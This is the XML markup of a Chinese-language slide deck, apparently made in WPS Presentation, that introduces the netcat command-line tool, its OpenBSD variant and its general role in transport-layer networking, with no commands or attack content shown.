        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4395266" y="1305654"/>
            <a:ext cx="4320480" cy="2561590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　nc 是一个【命令行】工具，能够让你很方便、很灵活地操纵【传输层协议】（这里所说的 “传输层协议” 指的是 OSI 模型中的第 4 层，主要是 TCP ＆ UDP）。 </a:t>
            </a:r>
            <a:endParaRPr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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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Connector: Elbow 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4572629" y="-767018"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2117646"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4571993" y="1300777"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2117646"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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 name="išḷïḑè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3623277" y="1437085"/>
            <a:ext cx="1874458" cy="334065"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:noFill/>
            <a:prstDash val="sysDash"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="îś1íḓè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1897781"/>
            <a:ext cx="1446490" cy="1446462"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="iṧlîḑe"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013385" y="1897515"/>
            <a:ext cx="1447047" cy="1447018"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="îṧḷidê"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7500992" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="îṧḷîḍè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1156102" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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chemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779979" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7110074" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810039" y="1443907"/>
            <a:ext cx="1556919" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>变种</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2130425" y="1707515"/>
            <a:ext cx="4883150" cy="2141220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:noAutofit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这篇教程的内容，主要基于 OpenBSD 社区的变种（也叫 “OpenBSD netcat” 或“netcat-openbsd”）  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="225" dirty="0">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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>虽然它出自 OpenBSD 社区，但很多主流 Linux 发行版的官方软件仓库已包含这个变种。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="225"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1600" spc="225"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MH_Entry_1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434936" y="63546"/>
            <a:ext cx="2264856" cy="3739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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="150" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="25"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a:off x="0" y="0"/>
            <a:ext cx="6491153" cy="5143500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8531131"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 8531131 w 8531131"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 853113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31131" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3660868" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8531131" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3660868" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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2060"/>
              </a:solidFill>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827518" y="1443877"/>
            <a:ext cx="3924435" cy="1607185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899969" y="3076140"/>
            <a:ext cx="720080" cy="456479"/>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2" descr="C:\Users\Administrator\Desktop\51yuadddnsu.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13172"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3923928" y="159481"/>
            <a:ext cx="5271253" cy="4984019"/>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197768" y="159482"/>
            <a:ext cx="8748464" cy="4824536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">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p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>
          </a:xfrm>
          <a:prstGeom prst="r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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4395266" y="1305654"/>
            <a:ext cx="4320480" cy="1730375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　要使用 nc，你就需要在【命令行】中与它打交道（它所有的功能，都以命令行的方式呈现给你用）。</a:t>
            </a:r>
            <a:endParaRPr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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20150429225421"/>
  <p:tag name="MH_LIBRARY" val="CONTENTS"/>
  <p:tag name="MH_TYPE" val="ENTRY"/>
  <p:tag name="ID" val="547142"/>
  <p:tag name="MH_ORDER" val="1"/>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MH" val="20150429225421"/>
  <p:tag name="MH_LIBRARY" val="CONTENTS"/>
  <p:tag name="MH_TYPE" val="ENTRY"/>
  <p:tag name="ID" val="547142"/>
  <p:tag name="MH_ORDER" val="1"/>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commondata" val="eyJoZGlkIjoiMjQ1MjI2ZGU0MjZhMzdmMTI5MDI3NjNkNDE1NDk2NWMifQ=="/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20150429225421"/>
  <p:tag name="MH_LIBRARY" val="CONTENTS"/>
  <p:tag name="MH_TYPE" val="ENTRY"/>
  <p:tag name="ID" val="547142"/>
  <p:tag name="MH_ORDER" val="1"/>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4711</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>全屏显示(16:9)</PresentationFormat>
  <Paragraphs>297</Paragraphs>
